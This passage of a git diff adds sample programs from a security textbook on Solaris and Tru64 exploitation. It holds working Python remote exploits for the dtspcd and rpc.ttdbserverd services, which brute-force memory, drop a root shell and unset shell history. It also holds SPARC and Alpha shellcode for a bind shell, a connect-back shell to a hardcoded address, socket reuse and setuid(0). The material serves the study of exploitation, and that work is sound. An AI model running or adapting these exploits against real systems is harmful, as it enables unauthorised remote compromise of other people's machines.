+        print self.uname_d
+
+        self.spc_write("", SPC_ABORT)
+
+        self.sck.close()
+        
+    def setup(self):
+        
+        try:
+            self.sck = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP)
+            self.sck.connect((self.target, self.port))
+        except socket.error, err:
+            raise DTSPCDException, "DTSPCDExploit, Host: " + str(self.target) + ":"\
+                  + str(self.port) + " " + err[1]
+        
+    def exploit(self, retloc, retaddr):
+
+        self.setup()
+        
+        self.ovf = "\xa4\x1c\x40\x11\x20\xbf\xff\xff" * ((4096 - 8 - len(self.shellcode)) / 8)
+
+        self.ovf += self.shellcode + "\x00\x00\x10\x3e" + "\x00\x00\x00\x14" +\
+                    "\x12\x12\x12\x12" + "\xff\xff\xff\xff" + "\x00\x00\x0f\xf4" +\
+                    self.get_chunk(retloc, retaddr)
+        self.ovf += "A" * ((0x103e - 8) - len(self.ovf))
+
+        #raw_input("attach")
+        
+        self.spc_write(self.spc_register("", self.ovf), SPC_REGISTER)
+
+        time.sleep(0.1)
+        self.check_bd()
+        
+        #self.spc_write("", SPC_ABORT)
+        
+        self.sck.close()
+
+    def get_chunk(self, retloc, retaddr):
+        
+        return "\x12\x12\x12\x12" + struct.pack(">l", retaddr) +\
+               "\x23\x23\x23\x23" + "\xff\xff\xff\xff" +\
+               "\x34\x34\x34\x34" + "\x45\x45\x45\x45" +\
+               "\x56\x56\x56\x56" + struct.pack(">l", (retloc - 8))
+
+    def attack(self):
+
+        print "[*]  retrieving remote version [*]"
+        self.get_uname()
+        print "[*]      exploiting ...       [*]"
+        
+        #do some parsing later ;p
+        
+        self.ldso_base = 0xff3b0000 #solaris 7, 8 also 9
+        
+        self.thr_jmp_table = [ 0x321b4, 0x361d8, 0x361e0, 0x381e8 ] #from various patch clusters
+        self.increment = 0x400
+        
+        for each in self.thr_jmp_table:
+            
+            self.retaddr_base = 0x2c000 #vanilla solaris 8 heap brute start
+                                        #almost always work!
+            
+            while self.retaddr_base < 0x2f000: #heap brute force end
+
+                print "trying; retloc: 0x%08x, retaddr: 0x%08x" %\
+                      ((self.ldso_base+each), self.retaddr_base)
+                self.exploit((each+self.ldso_base), self.retaddr_base)
+
+                self.exploit((each+self.ldso_base), self.retaddr_base+4)
+
+                self.retaddr_base += self.increment
+
+    def check_bd(self):
+        try:
+            self.recvbuf = self.sck.recv(100)
+            if self.recvbuf.find("ksh") != -1:
+                print "got shellcode response: ", self.recvbuf
+                self.proxy()
+        except socket.error:
+            pass
+
+        return -1
+    
+    def proxy(self):
+        
+        self.t = telnetlib.Telnet()
+        self.t.sock = self.sck
+        self.t.write("unset HISTFILE;uname -a;\n")
+        self.t.interact()
+        sys.exit(1)
+        
+                
+    def run(self):
+        self.attack()
+        return
+
+
+if __name__ == "__main__":
+
+    if len(sys.argv) < 2:
+        print "usage: dtspcd_exp.py target_ip"
+        sys.exit(0)
+
+    
+    exp = DTSPCDExploit(sys.argv[1])
+    #print "user, target, port: ", exp.get_user(), exp.get_target(), 
+    exp.get_port()
+    exp.run()
diff --git a/Chapter_11/Shellcoders11-find_sym.c b/Chapter_11/Shellcoders11-find_sym.c
new file mode 100644
index 0000000..834bbc6
--- /dev/null
+++ b/Chapter_11/Shellcoders11-find_sym.c
@@ -0,0 +1,80 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 11: Advanced Solaris Exploitation
+Sample Program #5
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+#include <stdio.h>
+#include <dlfcn.h>
+#include <sys/types.h>
+#include <sys/elf.h>
+#include <fcntl.h>
+#include <sys/mman.h>
+#include <libelf.h>
+
+u_long find_sym(char *, char *);
+
+u_long
+find_sym(char *base, char *buzzt)
+{
+  Elf32_Ehdr *ehdr;
+  Elf32_Shdr *shdr;
+  Elf32_Word *dynsym, *dynstr;
+  Elf32_Sym  *sym;
+  const char *s1, *s2;
+  register int i = 0;
+
+    ehdr = (Elf32_Ehdr *) base;
+
+    shdr = (Elf32_Shdr *) ((char *)base + (Elf32_Off) ehdr->e_shoff);
+
+    /* look for .dynsym */
+
+    while( i < ehdr->e_shnum){
+
+         if(shdr->sh_type == SHT_DYNSYM){
+                        dynsym = (Elf32_Word *) shdr->sh_addr;
+                        dynstr = (Elf32_Word *) shdr->sh_link;
+                        //offset to the dynamic string table's section header
+                        break;
+         }
+
+         shdr++, i++;
+     }
+
+    shdr = (Elf32_Shdr *) (base + ehdr->e_shoff);
+     /* this section header represents the dynamic string table */
+    shdr += (Elf32_Word) dynstr; 
+    dynstr = (Elf32_Addr *) shdr->sh_addr; /*relative location of .dynstr*/
+
+    dynstr += (Elf32_Word) base / sizeof(Elf32_Word); /* relative to virtual */
+    dynsym += (Elf32_Word) base / sizeof(Elf32_Word); /* relative to virtual */
+
+        sym = (Elf32_Sym *)  dynsym;
+
+        while(1) {
+
+        /* first entry is in symbol table is always empty, pass it */
+                sym++; /* next entry in symbol table */
+
+                if(ELF32_ST_TYPE(sym->st_info) != STT_FUNC)
+                        continue;
+
+                s1 = (char *) ((char *) dynstr + sym->st_name);
+                s2 = buzzt;
+
+                while (*s1 == *s2++)
+                        if (*s1++ == 0)
+                                return sym->st_value;
+        }
+
+}
diff --git a/Chapter_11/Shellcoders11sampleprogram01.c b/Chapter_11/Shellcoders11sampleprogram01.c
new file mode 100644
index 0000000..e8b13a1
--- /dev/null
+++ b/Chapter_11/Shellcoders11sampleprogram01.c
@@ -0,0 +1,54 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 11: Advanced Solaris Exploitation
+Sample Program #1
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+
+#include <stdio.h>
+
+                       /* http://lsd-pl.net           */
+char shellcode[]=          /* 10*4+8 bytes                   */
+    "\x20\xbf\xff\xff"     /* bn,a    <shellcode-4>          */
+    "\x20\xbf\xff\xff"     /* bn,a    <shellcode>            */
+    "\x7f\xff\xff\xff"     /* call    <shellcode+4>          */
+    "\x90\x03\xe0\x20"     /* add     %o7,32,%o0             */
+    "\x92\x02\x20\x10"     /* add     %o0,16,%o1             */
+    "\xc0\x22\x20\x08"     /* st      %g0,[%o0+8]            */
+    "\xd0\x22\x20\x10"     /* st      %o0,[%o0+16]           */
+    "\xc0\x22\x20\x14"     /* st      %g0,[%o0+20]           */
+    "\x82\x10\x20\x0b"     /* mov     0x0b,%g1               */
+    "\x91\xd0\x20\x08"     /* ta      8                      */
+    "/bin/ksh"
+;
+
+int
+main(int argc, char **argv)
+{
+        long *ptr;
+        long *addr = (long *) shellcode;
+
+        printf("la la lala laaaaa\n");
+
+  //ld.so base + thr_jmp_table
+  //[433]   |0x000321b4|0x0000001c|OBJT |LOCL |0    |14     |thr_jmp_table
+  //0xFF3B0000 + 0x000321b4       
+
+        ptr = (long *) 0xff3e21b4;
+        *ptr++ = (long)((long *) shellcode);
+
+        strcmp("mocha", "latte");  //this will make us enter the dynamic linker 
+                             //since there is no prior call to strcmp()
+
+}
+
+
diff --git a/Chapter_11/Shellcoders11sampleprogram02.c b/Chapter_11/Shellcoders11sampleprogram02.c
new file mode 100644
index 0000000..00e2e3f
--- /dev/null
+++ b/Chapter_11/Shellcoders11sampleprogram02.c
@@ -0,0 +1,61 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 11: Advanced Solaris Exploitation
+Sample Program #2
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+.align 4
+        .global main
+        .type    main,#function
+        .proc   04
+main:
+        ! mmap(0, 0x8000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANON|MAP_SHARED, -
+1, 0);
+        xor     %l1, %l1, %o0   ! %o0 = 0
+        mov     8, %l1
+        sll     %l1, 12, %o1    ! %o1 = 0x8000
+        mov     7, %o2          ! %o2 = 7
+        sll     %l1, 28, %o3
+        or      %o3, 0x101, %o3 ! %o3 = 257
+        mov     -1, %o4         ! %o4 = -1
+        xor     %l1, %l1, %o5   ! %o5 = 0
+        mov     115, %g1        ! SYS_mmap        115
+        ta      8               ! mmap
+
+        xor     %l2, %l2, %l1   ! %l1 = 0
+        add     %l1, %o0, %g2   ! addr of new map
+
+      ! store the address of the new memory region in %g2
+      
+      ! len = read(sock, map, 0x8000);      
+      ! socket number can be hardcoded, or use getpeername tricks
+        add     %i1, %l1, %o0   ! sock number assumed to be in %i1
+        add     %l1, %g2, %o1   ! address of the new memory region
+        mov     8, %l1            
+        sll     %l1, 12, %o2      ! bytes to read 0x8000
+        mov     3, %g1          ! SYS_read        3
+        ta      8               ! trap to system call
+
+        mov     -8, %l2
+        add     %g2, 8, %l1
+loop:
+        flush   %l1 - 8            ! flush the instruction cache
+        cmp     %l2, %o0        ! %o0 = number of bytes read
+        ble,a   loop            ! loop %o0 / 4 times
+        add     %l2, 4, %l2      ! increment the counter
+
+jump:
+        !socket number is already in %i1
+        sub     %g2, 8, %g2
+        jmp     %g2 + 8            ! jump to the maped region
+        xor     %l4, %l5, %l1      ! delay slot
+        ta      3            ! debug trap, should never be reached ...
diff --git a/Chapter_12/Shellcoders12-bindsocket.txt b/Chapter_12/Shellcoders12-bindsocket.txt
new file mode 100644
index 0000000..458b590
--- /dev/null
+++ b/Chapter_12/Shellcoders12-bindsocket.txt
@@ -0,0 +1,85 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 13: HP Tru64 Unix Exploitation
+Sample Program #9
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+#include <alpha/regdef.h>     
+     .text
+     .arch     generic
+     .align 4
+     .globl  main
+     .ent      main
+main:
+     .frame  $sp, 0, $26
+
+                                 #xorloop will give us the pc in a0,
+                                 #PC should be pointing to the next in-struction.
+                         #196 bytes total size.
+
+     bic  sp, 0xf, sp               #make sure the stack is 16 byte aligned
+     addq a0, 156, s1          #address of sockaddr_in. s1 preserved
+     addq a0, 172, s2          #address of sizeof(sockadd_in)   
+     addq a0, 184, s4          #address of //bin/sh     
+     stq  s4, (sp)                  #store address of //bin/sh
+     stq  zero, 8(sp)
+     
+     mov  0x2, a0               #AF_INET
+     mov  0x1, a1               #SOCK_STREAM
+     bis  zero, zero, a2       #0
+     addq zero, 0x61, v0       #socket syscall
+     PAL_callsys
+     mov  v0, s0               #saved register, preserved. store socket number.
+     
+     mov  s0, a0               #socket number.
+     mov  s1, a1               #address of sockaddr_in
+     mov  0x10, a2              #sizeof sockaddr_in = 16
+             addq zero, 0x68, v0       #bind syscall.
+     PAL_callsys
+
+     mov  s0, a0               #socket number.
+     mov  0x5, a2              #backlog.
+             addq zero, 0x6a, v0       #listen syscall.
+     PAL_callsys
+
+     mov  s0, a0               #socket number.
+     bis  zero, zero, a1       #(struct sockaddr *)NULL
+     mov  s2, a2               #address of sizeof sockaddr
+             addq zero, 0x63, v0       #accept syscall.
+     PAL_callsys
+     mov  v0, s3               #connected socket number.
+
+     mov 0x2, s2
+duploop:     
+     mov  s3, a0               #connected socket number.
+     mov  s2, a1               #stdin, stdout, stderr
+             addq zero, 0x5a, v0       #dup2 syscall
+     PAL_callsys
+     subq s2, 0x1, s2          #decrement the counter
+     bge  s2, duploop          #loop for 2,1,0 (stderr, stdout, stdin)
+     
+     mov  s4, a0               #address of //bin/sh
+     mov  sp, a1              #address of (address of //bin/sh)
+     bis  zero, zero, a2       #NULL
+             addq zero, 0x3b, v0       #execve syscall
+     PAL_callsys
+
+.long   0x901f0002      
+.long   0x00000000      
+.long   0x00000000
+.long   0x00000000
+.long   0x10
+.long   0x00000000
+.long   0x00000000     
+.quad   0x68732f6e69622f2f
+.long   0x00000000
+     .end      main
diff --git a/Chapter_12/Shellcoders12-connectback.txt b/Chapter_12/Shellcoders12-connectback.txt
new file mode 100644
index 0000000..aaff6e6
--- /dev/null
+++ b/Chapter_12/Shellcoders12-connectback.txt
@@ -0,0 +1,72 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 13: HP Tru64 Unix Exploitation
+Sample Program #9
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+#include <alpha/regdef.h>
+#include <alpha/pal.h>
+     .text
+     .arch     generic
+     .align 4
+     .globl  main
+     .ent      main
+main:
+     .frame  $sp, 0, $26
+                    #148 bytes total size.
+                                 #xorloop will give us the pc in a0,
+                                 #PC should be pointing to the next in-struction.
+
+     bic  sp, 0xf, sp               #make sure the stack is 16 byte aligned.
+     addq a0, 0x70, s1         #address of sockaddr_in. s1 preserved
+     addq a0, 0x88, s4         #address of //bin/sh     
+     stq  s4, (sp)                  #store address of //bin/sh
+     stq  zero, 8(sp)
+     
+     mov  0x2, a0               #AF_INET
+     mov  0x1, a1               #SOCK_STREAM
+     bis  zero, zero, a2       #0
+     addq zero, 0x61, v0       #socket syscall
+     PAL_callsys
+     mov  v0, s0               #saved register, preserved. store socket number.
+     
+     mov  s0, a0               #socket number
+     mov  s1, a1               #addr of sockaddr_in
+     mov  0x10, a2              #sizeof sockaddr_in equals 16
+             addq zero, 0x62, v0       #connect syscall
+     PAL_callsys
+
+
+     mov 0x2, s2
+duploop:     
+     mov  s0, a0               #socket number.
+     mov  s2, a1               #stdin, stdout, stderr.
+             addq zero, 0x5a, v0       #dup2 syscall.
+     PAL_callsys
+     subq s2, 0x1, s2          #decrement the counter.
+     bge  s2, duploop          #loop for 2,1,0 (stderr, stdout, stdin).
+     
+     mov  s4, a0               #address of //bin/sh
+     mov  sp, a1              #address of (address of //bin/sh)
+     bis  zero, zero, a2       #NULL
+             addq zero, 0x3b, v0       #execve syscall
+     PAL_callsys
+
+.long   0x901f0002                     #port number 
+.long   0x0100007f                      #ip addr
+.long   0x00000000      
+.long   0x00000000
+.long   0x10
+.long   0x00000000
+.quad   0x68732f6e69622f2f
+.long   0x00000000
+     .end      main
diff --git a/Chapter_12/Shellcoders12-findsocket.txt b/Chapter_12/Shellcoders12-findsocket.txt
new file mode 100644
index 0000000..b33d989
--- /dev/null
+++ b/Chapter_12/Shellcoders12-findsocket.txt
@@ -0,0 +1,78 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 13: HP Tru64 Unix Exploitation
+Sample Program #9
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+#include <alpha/regdef.h>
+#include <alpha/pal.h>
+     .text
+     .arch     generic
+     .align 4
+     .globl  main
+     .ent      main
+main:
+     .frame  $sp, 0, $26
+                                 #xorloop will give us the pc in a0,
+                                 #PC should be pointing to the next in-struction.
+
+     bic  sp, 0xf, sp               #make sure the stack is 16 byte aligned.
+     addq a0, 0xa0, s4         #address of //bin/sh
+     stq  s4, (sp)                  #store address of //bin/sh
+     stq  zero, 8(sp)
+     mov  0x10, t0
+     stq  t0, 16(sp)                #sizeof(struct sockaddr_in)
+     lda  s2, 16(sp)                #address of sizeof(struct sockaddr_in)
+     lda  s1, 24(sp)                #address of sockaddr_in
+     bis  zero, zero, s0
+     lda  s0, 0xff(zero)       #set counter for the getpeername loop.
+     bis  zero, zero, s3       #zero out s3
+     mov  0x3412, s3           #src port of peer
+     sll  s3, 0x30, s3
+     srl  s3, 0x30, s3
+     
+getpeerloop:
+     mov  s0, a0               #socket number.
+     mov  s1, a1               #address of sockaddr_in
+     mov  s2, a2               #address of sizeof(struct sockaddr_in)
+             addq zero, 0x8d, v0       #getpeername syscall.
+     PAL_callsys
+     bne  v0, again
+     ldl  t0, 24(sp)
+     sll  t0, 0x20, t0
+     srl  t0, 0x30, t0
+     subq t0, s3, t0
+     beq  t0, out          #check if we have a matching source port.
+again:
+     subq s0, 0x1, s0
+     bge  s0, getpeerloop
+out:
+
+     mov 0x2, s2
+duploop:     
+     mov  s0, a0               #socket number
+     mov  s2, a1              #stdin, stdout, stderr
+             addq zero, 0x5a, v0       #dup2 syscall
+     PAL_callsys
+     subq s2, 0x1, s2          #decrement the counter.
+     bge  s2, duploop          #loop for 2,1,0 (stderr, stdout, stdin)
+     
+     mov  s4, a0               #address of //bin/sh
+     mov  sp, a1               #address of (address of //bin/sh)
+     bis  zero, zero, a2       #NULL
+             addq zero, 0x3b, v0       #execve syscall
+     PAL_callsys
+
+.long   0x00000000
+.quad   0x68732f6e69622f2f
+.long   0x00000000
+     .end      main
diff --git a/Chapter_12/Shellcoders12-rpc-ttdbserverd-exploit.txt b/Chapter_12/Shellcoders12-rpc-ttdbserverd-exploit.txt
new file mode 100644
index 0000000..409fdfe
--- /dev/null
+++ b/Chapter_12/Shellcoders12-rpc-ttdbserverd-exploit.txt
@@ -0,0 +1,242 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 13: HP Tru64 Unix Exploitation
+Sample Program #9
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+# noir@olympos.org
+# Tru64 5.0 – 5.1 rpc.ttdbserverd remote exploit
+import socket
+import os
+import xdr
+import rpc
+from rpc import Packer, Unpacker, TCPClient
+import sys
+import struct
+import telnetlib
+
+class TTDBException(Exception):
+    
+    def __init__(self, args=None):
+        self.args = args
+        
+    def __str__(self):
+        return `self.args`
+
+class TTDB_Packer(Packer):
+
+    def pack_ttdb_create_req(self, buf):
+        #file
+        self.pack_string(buf)
+
+        self.pack_uint(0)
+        #string
+        #self.pack_string('')
+        #array
+        #self.pack_uint(0)
+        #self.pack_string("\x01")
+        
+        self.pack_uint(0)
+        self.pack_uint(1)
+        self.pack_uint(777)
+
+
+class TTDB_Client(TCPClient):
+
+    def __init__(self, target):
+        self.ttdb_d = { "PROGNUM": 100083, "VERSNUM": 1, "ISCREATE": 103 }
+        
+        TCPClient.__init__(self, target, self.ttdb_d["PROGNUM"],\
+     self.ttdb_d["VERSNUM"])
+
+    def addpackers(self):
+        self.packer = TTDB_Packer()
+
+    def mkcred(self):
+        import random
+        self.cred = rpc.AUTH_UNIX, rpc.make_auth_unix(random.randint(1,99999),\
+                                                      "localhost", 0, 0, [])
+        return self.cred
+    
+    def iscreate(self, buf):
+        return self.make_call(self.ttdb_d["ISCREATE"], buf,\
+                              self.packer.pack_ttdb_create_req,\
+                              None)
+    
+class TTDBExploit(TTDB_Client):
+    
+    def __init__(self, target="", buf="", timeout = 5):
+        self.tm = timeout
+        self.target = target
+        self.buf = buf
+        
+    def set_target(self, ip):
+        try:
+            self.target = socket.gethostbyname(ip)
+        except socket.gaierror, err:
+            raise TTDBException, "TTDBExploit, Host: " + ip + " " + err[1]
+
+    def get_target(self):
+        return self.target
+    
+    def set_buf(self, buf):
+        self.buf = buf
+
+    def get_buf(self):
+        return self.buf
+
+    def set_timeout(self, tm):
+        self.tm = tm
+
+    def get_timeout(self):
+        return self.tm
+
+    def setup(self):
+        try:
+            TTDB_Client.__init__(self, self.target)
+        except (socket.error, RuntimeError), self.err:
+            raise TTDBException, str(self.err)
+        
+    def run(self):
+        try:
+            self.iscreate(self.buf)
+        except:
+            pass
+         
+if __name__ == "__main__":
+
+    usage = """\nUsage: ttdb_exp.py targethost bdport version [offset]
+bdport: port number for bind a shell
+version: 0 => Tru64 UNIX V5.0A
+version: 1 => Tru64 UNIX V5.1
+
+./ttdb_exp 172.16.1.23 6666 0
+"""
+    shellcode =\
+    "\x18\xfc\x1e\x22"+\
+    "\x12\x14\x06\x42"+\
+    "\x11\xd4\xf0\x47"+\
+    "\xfc\xff\x30\xb2"+\
+    "\xfc\xff\x32\xb2"+\
+    "\xfb\xff\x1f\xd2"+\
+    "\x15\x14\x1f\x42"+\
+    "\x14\x94\x06\x42"+\
+    "\x13\x94\xf8\x43"+\
+    "\xfc\xff\x35\xa2"+\
+    "\x10\x14\x06\x42"+\
+    "\xfc\xff\x54\xa2"+\
+    "\x33\x95\x60\x42"+\
+    "\x12\x08\x51\x46"+\
+    "\xfc\xff\x54\xb2"+\
+    "\x14\x94\x80\x42"+\
+    "\xfa\xff\x7f\xf6"+\
+    "\x41\x41\x41\x41"+\
+    "\x96\x79\x49\xcf"+\
+    "\x82\x1c\x9b\xca"+\
+    "\x83\x1c\x9d\xca"+\
+    "\x80\x88\x76\x3f"+\
+    "\x85\x9c\x9f\xca"+\
+    "\x88\x88\x36\x3d"+\
+    "\x88\xbc\x64\xcb"+\
+    "\x98\xdc\x68\xcb"+\
+    "\x99\xbc\x68\xcb"+\
+    "\x9a\x8c\x77\xcf"+\
+    "\x0b\x88\x88\x88"+\
+    "\x81\x8c\x88\xcc"+\
+    "\x98\x8c\xa1\xcd"+\
+    "\x99\x8c\xc2\xcd"+\
+    "\x88\x9c\x65\xcb"+\
+    "\x9a\x9c\x6a\xcb"+\
+    "\x0b\x88\x88\x88"+\
+    "\x98\x8c\xa1\xcd"+\
+    "\x9a\x3c\x68\xcb"+\
+    "\x88\xdc\x65\xcb"+\
+    "\x0b\x88\x88\x88"+\
+    "\x99\x8c\x77\xcf"+\
+    "\x98\x8c\xa1\xcd"+\
+    "\x9a\x8c\xe3\xcd"+\
+    "\x88\xfc\x64\xcb"+\
+    "\x0b\x88\x88\x88"+\
+    "\x84\x8c\x88\xcc"+\
+    "\x83\xdc\x68\xcb"+\
+    "\x98\x8c\x04\xcd"+\
+    "\x99\x8c\xe3\xcd"+\
+    "\x88\xdc\x63\xcb"+\
+    "\x0b\x88\x88\x88"+\
+    "\xa3\xbd\xe8\xc9"+\
+    "\x72\x77\xf7\x71"+\
+    "\x98\x8c\x25\xcd"+\
+    "\x99\x8c\x56\xcf"+\
+    "\x88\xfc\x6f\xcb"+\
+    "\x9a\x8c\x77\xcf"+\
+    "\x0b\x88\x88\x88"+\
+    "\x8a\x88\x97\x18"+\
+    "\x88\x88\x88\x88"+\
+    "\x88\x88\x88\x88"+\
+    "\x88\x88\x88\x88"+\
+    "\x98\x88\x88\x88"+\
+    "\x88\x88\x88\x88"+\
+    "\x88\x88\x88\x88"+\
+    "\xa7\xa7\xea\xe1"+\
+    "\xe6\xa7\xfb\xe0"+\
+    "\x88\x88\x88\x88"+\
+    "\x88\x88\x88\x88"
+
+    if len(sys.argv) < 4:
+        print usage
+        sys.exit(0)
+        
+    offset = 0
+    if len(sys.argv) == 5:
+        offset += int(sys.argv[4], 10)
+        
+    version = int(sys.argv[3],10)    
+    if version != 0 and version != 1:
+        print usage
+        sys.exit(-1)
+    
+    port = int(sys.argv[2], 10)     #bind shell port
+    
+    port = port ^ 0x8888
+    shellcode = shellcode[:230] + struct.pack(">h", port) + shell-code[232:]
+    
+    
+    if not version:
+        retaddr = struct.pack("<Lb", 0x400355a8+offset, 0x01) #5.0A
+        #retaddr = struct.pack("<Lb", 0xdeadcaf0, 0xde) #test value
+    else:
+        retaddr = struct.pack("<Lb", 0x40037580+offset, 0x01) #5.1
+        #retaddr = struct.pack("<Lb", 0xdeadcaf0, 0xde) #test value
+    
+    expbuf = "\x1f\x04\xff\x47" * ((1024-len(shellcode)) / 4) +\
+             shellcode + "123456" + retaddr
+           
+    ttdb = TTDBExploit(sys.argv[1], expbuf)
+    
+    print "attacking "+ttdb.get_target()+" ..."
+    print "after 4-5 seconds hit ctrl+C, since rpc.py did not"+\
+          " implemented timeouts yet. lame i know!"
+    
+    ttdb.setup()
+    ttdb.run()
+    
+    try:
+        print "trying backdoor ..."
+        t = telnetlib.Telnet(sys.argv[1], int(sys.argv[2], 10))
+        t.write("unset HISTFILE;uname -a;\n")
+        print "\n"
+        t.interact()
+        t.close()
+    except socket.error:
+        print "not successful!, try again"
+        
+    sys.exit(1)
diff --git a/Chapter_12/Shellcoders12sampleprogram01.c b/Chapter_12/Shellcoders12sampleprogram01.c
new file mode 100644
index 0000000..7b16c81
--- /dev/null
+++ b/Chapter_12/Shellcoders12sampleprogram01.c
@@ -0,0 +1,55 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 12: HP Tru64 Unix Exploitation
+Sample Program #1
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+
+#include <alpha/regdef.h>
+          .text
+          .arch          generic
+          .align 4
+          .globl  main
+          .ent           main
+main:
+          .frame  $sp, 0, $26
+
+          lda  a0, -1000(sp)             #load a0 with stack address (sp – 1000)
+back:
+          bis  zero, 0x86, a1            #a1 equals to 0x00000086, this is the imb opcode
+                                         #the imb instruction syncs the instruction cache
+                                         #thus making it coherent with the main memory
+
+                                         #1st round: store imb instruc-tion in (sp – 1000)
+          stl  a1, -4(a0)                #2nd round: overwrite the following bsr instruction 
+                                         #with the imb opcode so that we won’t loop again
+
+     bsr  a0, back                       #branch the label back saving pc in a0 reg-ister
+                                         #on the second round bsr will be overwritten
+                                         #execution will continue with the next instruction
+                                         #shellcode continues from here …
+
+.text:200010D0      main:                                   
+.text:200010D0             
+.text:200010D0      18 FC 1E 22                 lda     $16, -1000($sp) 
+
+sub_200010D4:
+
+.text:200010D4      11 D4 F0 47                 mov     0x86, $17
+.text:200010D8      FC FF 30 B2                stl     $17, -4($16)
+.text:200010DC      FD FF 1F D2               bsr     $16, sub_200010D4
+………
+
+"\x18\xfc\x1e\x22"
+"\x11\xd4\xf0\x47"
+"\xfc\xff\x30\xb2"
+"\xfd\xff\x1f\xd2"
diff --git a/Chapter_12/Shellcoders12sampleprogram01.txt b/Chapter_12/Shellcoders12sampleprogram01.txt
new file mode 100644
index 0000000..7b16c81
--- /dev/null
+++ b/Chapter_12/Shellcoders12sampleprogram01.txt
@@ -0,0 +1,55 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 12: HP Tru64 Unix Exploitation
+Sample Program #1
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+
+#include <alpha/regdef.h>
+          .text
+          .arch          generic
+          .align 4
+          .globl  main
+          .ent           main
+main:
+          .frame  $sp, 0, $26
+
+          lda  a0, -1000(sp)             #load a0 with stack address (sp – 1000)
+back:
+          bis  zero, 0x86, a1            #a1 equals to 0x00000086, this is the imb opcode
+                                         #the imb instruction syncs the instruction cache
+                                         #thus making it coherent with the main memory
+
+                                         #1st round: store imb instruc-tion in (sp – 1000)
+          stl  a1, -4(a0)                #2nd round: overwrite the following bsr instruction 
+                                         #with the imb opcode so that we won’t loop again
+
+     bsr  a0, back                       #branch the label back saving pc in a0 reg-ister
+                                         #on the second round bsr will be overwritten
+                                         #execution will continue with the next instruction
+                                         #shellcode continues from here …
+
+.text:200010D0      main:                                   
+.text:200010D0             
+.text:200010D0      18 FC 1E 22                 lda     $16, -1000($sp) 
+
+sub_200010D4:
+
+.text:200010D4      11 D4 F0 47                 mov     0x86, $17
+.text:200010D8      FC FF 30 B2                stl     $17, -4($16)
+.text:200010DC      FD FF 1F D2               bsr     $16, sub_200010D4
+………
+
+"\x18\xfc\x1e\x22"
+"\x11\xd4\xf0\x47"
+"\xfc\xff\x30\xb2"
+"\xfd\xff\x1f\xd2"
diff --git a/Chapter_12/Shellcoders12sampleprogram02.c b/Chapter_12/Shellcoders12sampleprogram02.c
new file mode 100644
index 0000000..90476f6
--- /dev/null
+++ b/Chapter_12/Shellcoders12sampleprogram02.c
@@ -0,0 +1,27 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 12: HP Tru64 Unix Exploitation
+Sample Program #2
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+
+#include <alpha/regdef.h>
+#include <alpha/pal.h>
+     .text
+     .arch     generic
+     .align 4
+     .globl  main
+     .ent      main
+main:
+     bis  zero, zero, a0       #argument to setuid(), uid=0
+     addq zero, 0x17, v0       #setuid system call number.
+     PAL_callsys          #trap to kernel mode.
